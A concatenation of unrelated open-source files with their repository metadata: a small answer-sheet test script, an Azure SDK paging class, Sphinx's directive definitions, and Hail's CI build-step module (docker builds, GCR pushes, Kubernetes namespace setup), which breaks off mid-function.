"avg_line_length": 20.071428571428573,
"alnum_prop": 0.6476868327402135,
"repo_name": "gnarf/djangoproject.com",
"id": "6dd56ff629527f701c4bb8c67611ac1f0cfa60d3",
"size": "305",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "fundraising/migrations/0008_merge.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "133070"
},
{
"name": "CoffeeScript",
"bytes": "24188"
},
{
"name": "HTML",
"bytes": "216623"
},
{
"name": "JavaScript",
"bytes": "802988"
},
{
"name": "Makefile",
"bytes": "1628"
},
{
"name": "Python",
"bytes": "499515"
},
{
"name": "Ruby",
"bytes": "19821"
},
{
"name": "Smalltalk",
"bytes": "1917"
}
],
"symlink_target": ""
} |
import cv2
import sys

# Scanned answer sheet used by this smoke test.
name = "upload/IB_answer_sheet7.png"
image = cv2.imread(name)

# Fix: the original leaked the file handle (open() without close);
# 'with' guarantees it is closed.
with open("answer.txt") as f:
    answer = f.read()

temp = "%s" % "1"
print(temp)
sys.exit()
print(answer) | {
"content_hash": "c52ec72930ad16e84917d420ed4c491c",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 36,
"avg_line_length": 13.071428571428571,
"alnum_prop": 0.6612021857923497,
"repo_name": "Hubert51/AutoGrading",
"id": "6d6660c9c0d5bed1de05d25f7eed4280ce61a42c",
"size": "183",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Web/test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1232"
},
{
"name": "C",
"bytes": "400177"
},
{
"name": "C++",
"bytes": "197133"
},
{
"name": "CMake",
"bytes": "14482"
},
{
"name": "CSS",
"bytes": "10474"
},
{
"name": "HTML",
"bytes": "31429"
},
{
"name": "JavaScript",
"bytes": "6748"
},
{
"name": "Makefile",
"bytes": "13303"
},
{
"name": "PowerShell",
"bytes": "8175"
},
{
"name": "Python",
"bytes": "5716801"
},
{
"name": "Tcl",
"bytes": "1295070"
}
],
"symlink_target": ""
} |
from msrest.paging import Paged
class SnapshotPaged(Paged):
    """
    A paging container for iterating over a list of :class:`Snapshot <azure.mgmt.compute.v2016_04_30_preview.models.Snapshot>` objects
    """
    # msrest (de)serialization map: 'nextLink' carries the URL of the next
    # page, 'value' carries the current page's list of Snapshot models.
    _attribute_map = {
        'next_link': {'key': 'nextLink', 'type': 'str'},
        'current_page': {'key': 'value', 'type': '[Snapshot]'}
    }
    def __init__(self, *args, **kwargs):
        # All paging behavior is inherited from msrest's Paged base class.
        super(SnapshotPaged, self).__init__(*args, **kwargs)
| {
"content_hash": "3d2fad4bc2a85e055b299406b6e2c4b7",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 133,
"avg_line_length": 29.125,
"alnum_prop": 0.6008583690987125,
"repo_name": "lmazuel/azure-sdk-for-python",
"id": "0d2d8bc3af20aed494e88e38aeb059672559cb47",
"size": "940",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "azure-mgmt-compute/azure/mgmt/compute/v2016_04_30_preview/models/snapshot_paged.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "42572767"
}
],
"symlink_target": ""
} |
"""
sphinx.directives
~~~~~~~~~~~~~~~~~
Handlers for additional ReST directives.
:copyright: Copyright 2007-2014 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from docutils.parsers.rst import Directive, directives
from sphinx import addnodes
from sphinx.util.docfields import DocFieldTransformer
# import and register directives
from sphinx.directives.code import *
from sphinx.directives.other import *
# RE to strip backslash escapes
nl_escape_re = re.compile(r'\\\n')
strip_backslash_re = re.compile(r'\\(.)')
class ObjectDescription(Directive):
    """
    Directive to describe a class, function or similar object. Not used
    directly, but subclassed (in domain-specific directives) to add custom
    behavior.
    """
    has_content = True
    required_arguments = 1
    optional_arguments = 0
    final_argument_whitespace = True
    # 'noindex' is a flag option: its presence suppresses target and index
    # entry creation in run() below.
    option_spec = {
        'noindex': directives.flag,
    }
    # types of doc fields that this directive handles, see sphinx.util.docfields
    doc_field_types = []
    def get_signatures(self):
        """
        Retrieve the signatures to document from the directive arguments. By
        default, signatures are given as arguments, one per line.
        Backslash-escaping of newlines is supported.
        """
        # join lines continued with a trailing backslash before splitting
        lines = nl_escape_re.sub('', self.arguments[0]).split('\n')
        # remove backslashes to support (dummy) escapes; helps Vim highlighting
        return [strip_backslash_re.sub(r'\1', line.strip()) for line in lines]
    def handle_signature(self, sig, signode):
        """
        Parse the signature *sig* into individual nodes and append them to
        *signode*. If ValueError is raised, parsing is aborted and the whole
        *sig* is put into a single desc_name node.
        The return value should be a value that identifies the object. It is
        passed to :meth:`add_target_and_index()` unchanged, and otherwise only
        used to skip duplicates.
        """
        raise ValueError
    def add_target_and_index(self, name, sig, signode):
        """
        Add cross-reference IDs and entries to self.indexnode, if applicable.
        *name* is whatever :meth:`handle_signature()` returned.
        """
        return  # do nothing by default
    def before_content(self):
        """
        Called before parsing content. Used to set information about the current
        directive context on the build environment.
        """
        pass
    def after_content(self):
        """
        Called after parsing content. Used to reset information about the
        current directive context on the build environment.
        """
        pass
    def run(self):
        """
        Main directive entry function, called by docutils upon encountering the
        directive.
        This directive is meant to be quite easily subclassable, so it delegates
        to several additional methods. What it does:
        * find out if called as a domain-specific directive, set self.domain
        * create a `desc` node to fit all description inside
        * parse standard options, currently `noindex`
        * create an index node if needed as self.indexnode
        * parse all given signatures (as returned by self.get_signatures())
          using self.handle_signature(), which should either return a name
          or raise ValueError
        * add index entries using self.add_target_and_index()
        * parse the content and handle doc fields in it
        """
        # invoked as '<domain>:<objtype>' when registered by a domain
        if ':' in self.name:
            self.domain, self.objtype = self.name.split(':', 1)
        else:
            self.domain, self.objtype = '', self.name
        self.env = self.state.document.settings.env
        self.indexnode = addnodes.index(entries=[])
        node = addnodes.desc()
        node.document = self.state.document
        node['domain'] = self.domain
        # 'desctype' is a backwards compatible attribute
        node['objtype'] = node['desctype'] = self.objtype
        node['noindex'] = noindex = ('noindex' in self.options)
        self.names = []
        signatures = self.get_signatures()
        for i, sig in enumerate(signatures):
            # add a signature node for each signature in the current unit
            # and add a reference target for it
            signode = addnodes.desc_signature(sig, '')
            signode['first'] = False
            node.append(signode)
            try:
                # name can also be a tuple, e.g. (classname, objname);
                # this is strictly domain-specific (i.e. no assumptions may
                # be made in this base class)
                name = self.handle_signature(sig, signode)
            except ValueError:
                # signature parsing failed
                signode.clear()
                signode += addnodes.desc_name(sig, sig)
                continue  # we don't want an index entry here
            if name not in self.names:
                self.names.append(name)
                if not noindex:
                    # only add target and index entry if this is the first
                    # description of the object with this name in this desc block
                    self.add_target_and_index(name, sig, signode)
        contentnode = addnodes.desc_content()
        node.append(contentnode)
        if self.names:
            # needed for association of version{added,changed} directives
            self.env.temp_data['object'] = self.names[0]
        self.before_content()
        self.state.nested_parse(self.content, self.content_offset, contentnode)
        DocFieldTransformer(self).transform_all(contentnode)
        self.env.temp_data['object'] = None
        self.after_content()
        return [self.indexnode, node]
# backwards compatible old name for ObjectDescription, kept so existing
# imports of ``DescDirective`` keep working
DescDirective = ObjectDescription
class DefaultDomain(Directive):
    """Directive to (re-)set the default domain for this source file."""

    has_content = False
    required_arguments = 1
    optional_arguments = 0
    final_argument_whitespace = False
    option_spec = {}

    def run(self):
        build_env = self.state.document.settings.env
        requested = self.arguments[0].lower()
        # An unknown domain name simply resets the default (get() -> None).
        build_env.temp_data['default_domain'] = build_env.domains.get(requested)
        return []
# register the generic description directives with docutils
directives.register_directive('default-domain', DefaultDomain)
directives.register_directive('describe', ObjectDescription)
# new, more consistent, name
directives.register_directive('object', ObjectDescription)
| {
"content_hash": "c85118f02b8b99d85e1540638de003ac",
"timestamp": "",
"source": "github",
"line_count": 191,
"max_line_length": 81,
"avg_line_length": 35.70680628272251,
"alnum_prop": 0.625366568914956,
"repo_name": "analurandis/Tur",
"id": "250a013e96b5b3330a9f3cb417aafe67fbebb50b",
"size": "6844",
"binary": false,
"copies": "11",
"ref": "refs/heads/master",
"path": "backend/venv/Lib/site-packages/sphinx/directives/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "ApacheConf",
"bytes": "2277"
},
{
"name": "C",
"bytes": "433673"
},
{
"name": "C++",
"bytes": "21783"
},
{
"name": "CSS",
"bytes": "84779"
},
{
"name": "HTML",
"bytes": "340406"
},
{
"name": "JavaScript",
"bytes": "311663"
},
{
"name": "Makefile",
"bytes": "4235"
},
{
"name": "PowerShell",
"bytes": "8175"
},
{
"name": "Python",
"bytes": "14466829"
},
{
"name": "Shell",
"bytes": "3059"
},
{
"name": "TeX",
"bytes": "56837"
}
],
"symlink_target": ""
} |
import abc
import os.path
import json
import logging
from collections import defaultdict, Counter
from shlex import quote as shq
import yaml
import jinja2
from hailtop.utils import RETRY_FUNCTION_SCRIPT, flatten
from .utils import generate_token
from .environment import GCP_PROJECT, GCP_ZONE, DOMAIN, IP, CI_UTILS_IMAGE, \
DEFAULT_NAMESPACE, BATCH_PODS_NAMESPACE, KUBERNETES_SERVER_URL, BUCKET
from .globals import is_test_deployment
log = logging.getLogger('ci')
pretty_print_log = "jq -Rr '. as $raw | try \
(fromjson | if .hail_log == 1 then \
([.levelname, .asctime, .filename, .funcNameAndLine, .message, .exc_info] | @tsv) \
else $raw end) \
catch $raw'"
def expand_value_from(value, config):
    """Resolve *value* against *config*.

    A plain string is returned unchanged.  A dict of the form
    ``{'valueFrom': 'a.b.c'}`` is resolved by walking the dotted path
    through the nested *config* mapping.
    """
    if isinstance(value, str):
        return value
    assert isinstance(value, dict)
    resolved = config
    for segment in value['valueFrom'].split('.'):
        resolved = resolved[segment]
    return resolved
def get_namespace(value, config):
    """Resolve ``{'valueFrom': '<step>.name'}`` to the namespace created
    by the referenced ``createNamespace`` step in *config*."""
    assert isinstance(value, dict)
    parts = value['valueFrom'].split('.')
    assert len(parts) == 2
    assert parts[1] == 'name'
    namespace_step = config[parts[0]]
    assert namespace_step['kind'] == 'createNamespace'
    return namespace_step['name']
class Code(abc.ABC):
    """Abstract interface over a version of source code that CI can build."""

    @abc.abstractmethod
    def short_str(self):
        """Short human-readable identifier for this code version."""

    @abc.abstractmethod
    def config(self):
        """Configuration dict exposed to build steps."""

    @abc.abstractmethod
    def repo_dir(self):
        """Path to repository on the ci (locally)."""

    @abc.abstractmethod
    def checkout_script(self):
        """Bash script to checkout out the code in the current directory."""
class StepParameters:
    """Argument bundle threaded through ``Step.from_json`` constructors."""

    def __init__(self, code, scope, json, name_step):
        self.name_step = name_step
        self.json = json
        self.scope = scope
        self.code = code
class BuildConfigurationError(Exception):
    """Raised when a build configuration (build.yaml) is malformed."""
class BuildConfiguration:
    """Parsed build configuration: the list of steps to build for a scope."""
    def __init__(self, code, config_str, scope, requested_step_names=()):
        config = yaml.safe_load(config_str)
        # step name -> Step (or None when the step was skipped); shared with
        # StepParameters so later steps can resolve their dependencies by name
        name_step = {}
        self.steps = []
        if requested_step_names:
            log.info(f"Constructing build configuration with steps: {requested_step_names}")
        for step_config in config['steps']:
            step_params = StepParameters(code, scope, step_config, name_step)
            step = Step.from_json(step_params)
            # run-if-requested steps are only kept when explicitly requested
            if not step.run_if_requested or step.name in requested_step_names:
                self.steps.append(step)
                name_step[step.name] = step
            else:
                name_step[step.name] = None
        # transitively close requested_step_names over dependencies
        if requested_step_names:
            visited = set()
            def request(step):
                if step not in visited:
                    visited.add(step)
                    for s2 in step.deps:
                        request(s2)
            for step_name in requested_step_names:
                request(name_step[step_name])
            # keep only requested steps and their transitive dependencies
            self.steps = [s for s in self.steps if s in visited]
    def build(self, batch, code, scope):
        """Add build jobs (and, outside 'dev', cleanup jobs) to *batch*."""
        assert scope in ('deploy', 'test', 'dev')
        for step in self.steps:
            if step.scopes is None or scope in step.scopes:
                step.build(batch, code, scope)
        # dev builds skip cleanup entirely
        if scope == 'dev':
            return
        # a step's cleanup must wait for every step that depends on it
        step_to_parent_steps = defaultdict(set)
        for step in self.steps:
            for dep in step.all_deps():
                step_to_parent_steps[dep].add(step)
        for step in self.steps:
            parent_jobs = flatten([parent_step.wrapped_job() for parent_step in step_to_parent_steps[step]])
            log.info(f"Cleanup {step.name} after running {[parent_step.name for parent_step in step_to_parent_steps[step]]}")
            if step.scopes is None or scope in step.scopes:
                step.cleanup(batch, scope, parent_jobs)
class Step(abc.ABC):
    """A single node of the build graph; concrete kinds subclass this."""
    def __init__(self, params):
        json = params.json
        self.name = json['name']
        if 'dependsOn' in json:
            # reject the same dependency listed twice
            duplicates = [
                name
                for name, count in Counter(json['dependsOn']).items()
                if count > 1]
            if duplicates:
                raise BuildConfigurationError(f'found duplicate dependencies of {self.name}: {duplicates}')
            # skipped steps are recorded as None in name_step and dropped here
            self.deps = [params.name_step[d] for d in json['dependsOn'] if params.name_step[d]]
        else:
            self.deps = []
        self.scopes = json.get('scopes')
        self.run_if_requested = json.get('runIfRequested', False)
        # unique token namespacing this step's artifacts (e.g. image tags)
        self.token = generate_token()
    def input_config(self, code, scope):
        """Config dict available to this step's templates, including the
        configs of its direct dependencies keyed by their names."""
        config = {}
        config['global'] = {
            'project': GCP_PROJECT,
            'zone': GCP_ZONE,
            'domain': DOMAIN,
            'ip': IP,
            'k8s_server_url': KUBERNETES_SERVER_URL
        }
        config['token'] = self.token
        config['deploy'] = scope == 'deploy'
        config['scope'] = scope
        config['code'] = code.config()
        if self.deps:
            for d in self.deps:
                config[d.name] = d.config(scope)
        return config
    def deps_parents(self):
        """Jobs of direct dependencies, or None when there are none."""
        if not self.deps:
            return None
        return flatten([d.wrapped_job() for d in self.deps])
    def all_deps(self):
        """Transitive closure of dependencies, including this step itself."""
        visited = set([self])
        frontier = [self]
        while frontier:
            current = frontier.pop()
            for d in current.deps:
                if d not in visited:
                    visited.add(d)
                    frontier.append(d)
        return visited
    @staticmethod
    def from_json(params):
        """Dispatch on the 'kind' field to the matching Step subclass."""
        kind = params.json['kind']
        if kind == 'buildImage':
            return BuildImageStep.from_json(params)
        if kind == 'runImage':
            return RunImageStep.from_json(params)
        if kind == 'createNamespace':
            return CreateNamespaceStep.from_json(params)
        if kind == 'deploy':
            return DeployStep.from_json(params)
        if kind in ('createDatabase', 'createDatabase2'):
            return CreateDatabaseStep.from_json(params)
        raise BuildConfigurationError(f'unknown build step kind: {kind}')
    def __eq__(self, other):
        # steps are identified by name within a configuration
        return isinstance(other, self.__class__) and self.name == other.name
    def __hash__(self):
        return hash(self.name)
    @abc.abstractmethod
    def build(self, batch, code, scope):
        pass
    @abc.abstractmethod
    def cleanup(self, batch, scope, parents):
        pass
class BuildImageStep(Step):
    """Build step that docker-builds an image from a (possibly templated)
    Dockerfile and pushes it to GCR."""
    def __init__(self, params, dockerfile, context_path, publish_as, inputs): # pylint: disable=unused-argument
        super().__init__(params)
        self.dockerfile = dockerfile
        self.context_path = context_path
        self.publish_as = publish_as
        self.inputs = inputs
        # deploy-scope published images go to a stable name; everything else
        # goes to the shared ci-intermediate repository
        if params.scope == 'deploy' and publish_as and not is_test_deployment:
            self.base_image = f'gcr.io/{GCP_PROJECT}/{self.publish_as}'
        else:
            self.base_image = f'gcr.io/{GCP_PROJECT}/ci-intermediate'
        self.image = f'{self.base_image}:{self.token}'
        self.job = None
    def wrapped_job(self):
        # job list form used by deps_parents()/cleanup ordering
        if self.job:
            return [self.job]
        return []
    @staticmethod
    def from_json(params):
        json = params.json
        return BuildImageStep(params,
                              json['dockerFile'],
                              json.get('contextPath'),
                              json.get('publishAs'),
                              json.get('inputs'))
    def config(self, scope): # pylint: disable=unused-argument
        # exposed to dependent steps via Step.input_config
        return {
            'token': self.token,
            'image': self.image
        }
    def build(self, batch, code, scope):
        """Create the batch job that renders the Dockerfile and builds/pushes
        the image."""
        # declared inputs are staged from the build bucket into /io
        if self.inputs:
            input_files = []
            for i in self.inputs:
                input_files.append((f'gs://{BUCKET}/build/{batch.attributes["token"]}{i["from"]}', f'/io/{os.path.basename(i["to"])}'))
        else:
            input_files = None
        config = self.input_config(code, scope)
        # docker build context: either a repo subdirectory or a fresh dir
        if self.context_path:
            context = f'repo/{self.context_path}'
            init_context = ''
        else:
            context = 'context'
            init_context = 'mkdir context'
        rendered_dockerfile = 'Dockerfile'
        # the Dockerfile is either inline in build.yaml or a path in the repo;
        # either way it is rendered through jinja2 with the step config
        if isinstance(self.dockerfile, dict):
            assert ['inline'] == list(self.dockerfile.keys())
            render_dockerfile = f'echo {shq(self.dockerfile["inline"])} > Dockerfile.{self.token};\n'
            unrendered_dockerfile = f'Dockerfile.{self.token}'
        else:
            assert isinstance(self.dockerfile, str)
            render_dockerfile = ''
            unrendered_dockerfile = f'repo/{self.dockerfile}'
        render_dockerfile += (f'python3 jinja2_render.py {shq(json.dumps(config))} '
                              f'{shq(unrendered_dockerfile)} {shq(rendered_dockerfile)}')
        # warm the docker build cache from the last published image, if any
        if self.publish_as:
            published_latest = shq(f'gcr.io/{GCP_PROJECT}/{self.publish_as}:latest')
            pull_published_latest = f'retry docker pull {shq(published_latest)} || true'
            cache_from_published_latest = f'--cache-from {shq(published_latest)}'
        else:
            pull_published_latest = ''
            cache_from_published_latest = ''
        push_image = f'''
time retry docker push {self.image}
'''
        # deploys additionally retag and push the stable :latest name
        if scope == 'deploy' and self.publish_as and not is_test_deployment:
            push_image = f'''
docker tag {shq(self.image)} {self.base_image}:latest
retry docker push {self.base_image}:latest
''' + push_image
        copy_inputs = ''
        if self.inputs:
            for i in self.inputs:
                # to is relative to docker context
                copy_inputs = copy_inputs + f'''
mkdir -p {shq(os.path.dirname(f'{context}{i["to"]}'))}
cp {shq(f'/io/{os.path.basename(i["to"])}')} {shq(f'{context}{i["to"]}')}
'''
        script = f'''
set -ex
date
{ RETRY_FUNCTION_SCRIPT }
rm -rf repo
mkdir repo
(cd repo; {code.checkout_script()})
{render_dockerfile}
{init_context}
{copy_inputs}
FROM_IMAGE=$(awk '$1 == "FROM" {{ print $2; exit }}' {shq(rendered_dockerfile)})
gcloud -q auth activate-service-account \
  --key-file=/secrets/gcr-push-service-account-key/gcr-push-service-account-key.json
gcloud -q auth configure-docker
retry docker pull $FROM_IMAGE
{pull_published_latest}
CPU_PERIOD=100000
CPU_QUOTA=$(( $(grep -c ^processor /proc/cpuinfo) * $(cat /sys/fs/cgroup/cpu/cpu.shares) * $CPU_PERIOD / 1024 ))
MEMORY=$(cat /sys/fs/cgroup/memory/memory.limit_in_bytes)
docker build --memory="$MEMORY" --cpu-period="$CPU_PERIOD" --cpu-quota="$CPU_QUOTA" -t {shq(self.image)} \
  -f {rendered_dockerfile} \
  --cache-from $FROM_IMAGE {cache_from_published_latest} \
  {context}
{push_image}
date
'''
        log.info(f'step {self.name}, script:\n{script}')
        self.job = batch.create_job(CI_UTILS_IMAGE,
                                    command=['bash', '-c', script],
                                    mount_docker_socket=True,
                                    secrets=[{
                                        'namespace': BATCH_PODS_NAMESPACE,
                                        'name': 'gcr-push-service-account-key',
                                        'mount_path': '/secrets/gcr-push-service-account-key'
                                    }],
                                    attributes={'name': self.name},
                                    input_files=input_files,
                                    parents=self.deps_parents())
    def cleanup(self, batch, scope, parents):
        """Create an always-run job that untags the intermediate image.

        Deploy-published images are kept, so cleanup is skipped for them.
        """
        if scope == 'deploy' and self.publish_as and not is_test_deployment:
            return
        script = f'''
set -x
date
gcloud -q auth activate-service-account \
  --key-file=/secrets/gcr-push-service-account-key/gcr-push-service-account-key.json
until gcloud -q container images untag {shq(self.image)} || ! gcloud -q container images describe {shq(self.image)}
do
echo 'failed, will sleep 2 and retry'
sleep 2
done
date
true
'''
        self.job = batch.create_job(CI_UTILS_IMAGE,
                                    command=['bash', '-c', script],
                                    attributes={'name': f'cleanup_{self.name}'},
                                    secrets=[{
                                        'namespace': BATCH_PODS_NAMESPACE,
                                        'name': 'gcr-push-service-account-key',
                                        'mount_path': '/secrets/gcr-push-service-account-key'
                                    }],
                                    parents=parents,
                                    always_run=True,
                                    network='private')
class RunImageStep(Step):
    """Build step that renders a Jinja2 script and runs it in a container.

    The image name and secret names/namespaces may contain template values
    that are expanded against the step's input configuration.
    """

    def __init__(self, params, image, script, inputs, outputs, port, resources, service_account, secrets, always_run, timeout):  # pylint: disable=unused-argument
        super().__init__(params)
        self.image = expand_value_from(image, self.input_config(params.code, params.scope))
        self.script = script
        self.inputs = inputs
        self.outputs = outputs
        self.port = port
        self.resources = resources
        self.service_account = None
        if service_account:
            self.service_account = {
                'name': service_account['name'],
                'namespace': get_namespace(service_account['namespace'], self.input_config(params.code, params.scope))
            }
        self.secrets = secrets
        self.always_run = always_run
        self.timeout = timeout
        self.job = None

    def wrapped_job(self):
        """The single batch job created by build(), if any."""
        return [self.job] if self.job else []

    @staticmethod
    def from_json(params):
        """Construct the step from its JSON build-configuration entry."""
        spec = params.json
        return RunImageStep(params,
                            spec['image'],
                            spec['script'],
                            spec.get('inputs'),
                            spec.get('outputs'),
                            spec.get('port'),
                            spec.get('resources'),
                            spec.get('serviceAccount'),
                            spec.get('secrets'),
                            spec.get('alwaysRun', False),
                            spec.get('timeout', 3600))

    def config(self, scope):  # pylint: disable=unused-argument
        return {'token': self.token}

    def build(self, batch, code, scope):
        template = jinja2.Template(self.script, undefined=jinja2.StrictUndefined, trim_blocks=True, lstrip_blocks=True)
        rendered_script = template.render(**self.input_config(code, scope))

        log.info(f'step {self.name}, rendered script:\n{rendered_script}')

        # Inputs and outputs are staged through the build's GCS scratch area,
        # keyed by this batch's token.
        input_files = None
        if self.inputs:
            input_files = [
                (f'gs://{BUCKET}/build/{batch.attributes["token"]}{i["from"]}', i["to"])
                for i in self.inputs]

        output_files = None
        if self.outputs:
            output_files = [
                (o["from"], f'gs://{BUCKET}/build/{batch.attributes["token"]}{o["to"]}')
                for o in self.outputs]

        # Expand templated secret names/namespaces before mounting.
        secrets = []
        if self.secrets:
            secrets = [{
                'namespace': get_namespace(s['namespace'], self.input_config(code, scope)),
                'name': expand_value_from(s['name'], self.input_config(code, scope)),
                'mount_path': s['mountPath']
            } for s in self.secrets]

        self.job = batch.create_job(
            self.image,
            command=['bash', '-c', rendered_script],
            port=self.port,
            resources=self.resources,
            attributes={'name': self.name},
            input_files=input_files,
            output_files=output_files,
            secrets=secrets,
            service_account=self.service_account,
            parents=self.deps_parents(),
            always_run=self.always_run,
            timeout=self.timeout,
            network='private')

    def cleanup(self, batch, scope, parents):
        # Nothing to tear down: the job's container is ephemeral.
        pass
class CreateNamespaceStep(Step):
    """Build step that creates (and later deletes) a Kubernetes namespace
    together with an admin Role, an `admin` ServiceAccount bound to it,
    optional copied secrets, and an optional public `router` Service.

    NOTE(review): under `is_test_deployment` no namespace is ever created
    or deleted; the step only aliases the two well-known namespaces.
    """

    def __init__(self, params, namespace_name, admin_service_account, public, secrets):
        super().__init__(params)
        # Logical namespace name as written in the build configuration.
        self.namespace_name = namespace_name
        if admin_service_account:
            # Service account (from another namespace) that gets admin
            # rights in the new namespace.
            self.admin_service_account = {
                'name': admin_service_account['name'],
                'namespace': get_namespace(admin_service_account['namespace'], self.input_config(params.code, params.scope))
            }
        else:
            self.admin_service_account = None
        # Whether to additionally expose a public `router` Service.
        self.public = public
        self.secrets = secrets
        self.job = None

        if is_test_deployment:
            # Map the two supported logical names onto preexisting namespaces.
            assert self.namespace_name in ('default', 'batch_pods'), self.namespace_name
            if self.namespace_name == 'default':
                self._name = DEFAULT_NAMESPACE
            else:
                self._name = BATCH_PODS_NAMESPACE
            return

        if params.scope == 'deploy':
            self._name = namespace_name
        elif params.scope == 'test':
            # Unique per-run namespace: <code>-<logical name>-<token>.
            self._name = f'{params.code.short_str()}-{namespace_name}-{self.token}'
        elif params.scope == 'dev':
            self._name = params.code.namespace
        else:
            raise BuildConfigurationError(f"{params.scope} is not a valid scope for creating namespace")

    def wrapped_job(self):
        # The single kubectl-apply job, once build() has run.
        if self.job:
            return [self.job]
        return []

    @staticmethod
    def from_json(params):
        """Construct the step from its JSON build-configuration entry."""
        json = params.json
        return CreateNamespaceStep(params,
                                   json['namespaceName'],
                                   json.get('adminServiceAccount'),
                                   json.get('public', False),
                                   json.get('secrets'))

    def config(self, scope):  # pylint: disable=unused-argument
        # Exported so downstream steps can reference the expanded name.
        return {
            'token': self.token,
            'kind': 'createNamespace',
            'name': self._name
        }

    def build(self, batch, code, scope):  # pylint: disable=unused-argument
        if is_test_deployment:
            return

        # Assemble a multi-document Kubernetes YAML config.
        # NOTE(review): the indentation inside these YAML literals was
        # reconstructed from a whitespace-mangled source — verify against
        # the deployed manifests.
        config = ""
        if scope in ['deploy', 'test']:
            # FIXME label
            config = config + f'''\
apiVersion: v1
kind: Namespace
metadata:
  name: {self._name}
  labels:
    for: test
---
'''
        # Admin Role plus the `admin` ServiceAccount bound to it.
        config = config + f'''\
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: {self.namespace_name}-admin
  namespace: {self._name}
rules:
- apiGroups: [""]
  resources: ["*"]
  verbs: ["*"]
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: admin
  namespace: {self._name}
---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: admin-{self.namespace_name}-admin-binding
  namespace: {self._name}
subjects:
- kind: ServiceAccount
  name: admin
  namespace: {self._name}
roleRef:
  kind: Role
  name: {self.namespace_name}-admin
  apiGroup: ""
'''

        if self.admin_service_account:
            admin_service_account_name = self.admin_service_account['name']
            admin_service_account_namespace = self.admin_service_account['namespace']
            config = config + f'''\
---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: {admin_service_account_name}-{self.namespace_name}-admin-binding
  namespace: {self._name}
subjects:
- kind: ServiceAccount
  name: {admin_service_account_name}
  namespace: {admin_service_account_namespace}
roleRef:
  kind: Role
  name: {self.namespace_name}-admin
  apiGroup: ""
'''

        if self.public:
            config = config + '''\
---
apiVersion: v1
kind: Service
metadata:
  name: router
  labels:
    app: router
spec:
  ports:
  - name: http
    port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: router
'''

        script = f'''
set -ex
date
echo {shq(config)} | kubectl apply -f -
'''

        if self.secrets and not scope == 'deploy':
            # Copy each named secret from its source namespace into the
            # freshly created one.
            # NOTE(review): `kubectl get --export` is deprecated and removed
            # in newer kubectl releases — confirm the CI image's version.
            for s in self.secrets:
                script += f'''
kubectl -n {self.namespace_name} get -o json --export secret {s} | jq '.metadata.name = "{s}"' | kubectl -n {self._name} apply -f -
'''

        script += '''
date
'''

        self.job = batch.create_job(CI_UTILS_IMAGE,
                                    command=['bash', '-c', script],
                                    attributes={'name': self.name},
                                    # FIXME configuration
                                    service_account={
                                        'namespace': BATCH_PODS_NAMESPACE,
                                        'name': 'ci-agent'
                                    },
                                    parents=self.deps_parents(),
                                    network='private')

    def cleanup(self, batch, scope, parents):
        """Delete the per-run namespace (test scope only), retrying until
        the delete succeeds."""
        if scope in ['deploy', 'dev'] or is_test_deployment:
            return

        script = f'''
set -x
date
until kubectl delete namespace --ignore-not-found=true {self._name}
do
echo 'failed, will sleep 2 and retry'
sleep 2
done
date
true
'''
        self.job = batch.create_job(CI_UTILS_IMAGE,
                                    command=['bash', '-c', script],
                                    attributes={'name': f'cleanup_{self.name}'},
                                    service_account={
                                        'namespace': BATCH_PODS_NAMESPACE,
                                        'name': 'ci-agent'
                                    },
                                    parents=parents,
                                    always_run=True,
                                    network='private')
class DeployStep(Step):
    """Build step that applies a rendered Kubernetes config and optionally
    waits for the created Deployments/Services/Pods to become healthy."""

    def __init__(self, params, namespace, config_file, link, wait):  # pylint: disable=unused-argument
        super().__init__(params)
        self.namespace = get_namespace(namespace, self.input_config(params.code, params.scope))
        # Repo-relative path of the Jinja2-templated Kubernetes config.
        self.config_file = config_file
        # Optional list of link names to expose via job attributes.
        self.link = link
        # Optional list of wait specs: dicts with 'kind', 'name', 'for'
        # and, for Pods, 'timeout'.
        self.wait = wait
        self.job = None

    def wrapped_job(self):
        if self.job:
            return [self.job]
        return []

    @staticmethod
    def from_json(params):
        """Construct the step from its JSON build-configuration entry."""
        json = params.json
        return DeployStep(params,
                          json['namespace'],
                          # FIXME config_file
                          json['config'],
                          json.get('link'),
                          json.get('wait'))

    def config(self, scope):  # pylint: disable=unused-argument
        return {
            'token': self.token
        }

    def build(self, batch, code, scope):
        # Render the Kubernetes config template against this step's inputs.
        with open(f'{code.repo_dir()}/{self.config_file}', 'r') as f:
            template = jinja2.Template(f.read(), undefined=jinja2.StrictUndefined, trim_blocks=True, lstrip_blocks=True)
            rendered_config = template.render(**self.input_config(code, scope))

        script = '''\
set -ex
date
'''

        if self.wait:
            # Delete waited-on Pods first so the apply recreates them fresh.
            for w in self.wait:
                if w['kind'] == 'Pod':
                    script += f'''\
kubectl -n {self.namespace} delete --ignore-not-found pod {w['name']}
'''
        script += f'''
echo {shq(rendered_config)} | kubectl -n {self.namespace} apply -f -
'''

        if self.wait:
            for w in self.wait:
                name = w['name']
                if w['kind'] == 'Deployment':
                    assert w['for'] == 'available', w['for']
                    # FIXME what if the cluster isn't big enough?
                    # Dump pod logs whether or not the wait succeeded, then
                    # propagate the wait's exit code.
                    script += f'''
set +e
kubectl -n {self.namespace} rollout status --timeout=1h deployment {name} && \
kubectl -n {self.namespace} wait --timeout=1h --for=condition=available deployment {name}
EC=$?
kubectl -n {self.namespace} logs --tail=999999 -l app={name} --all-containers=true | {pretty_print_log}
set -e
(exit $EC)
'''
                elif w['kind'] == 'Service':
                    assert w['for'] == 'alive', w['for']
                    resource_type = w.get('resource_type', 'deployment').lower()
                    # NOTE(review): `timeout` is read here but never used in
                    # this branch — the kubectl waits hard-code --timeout=1h.
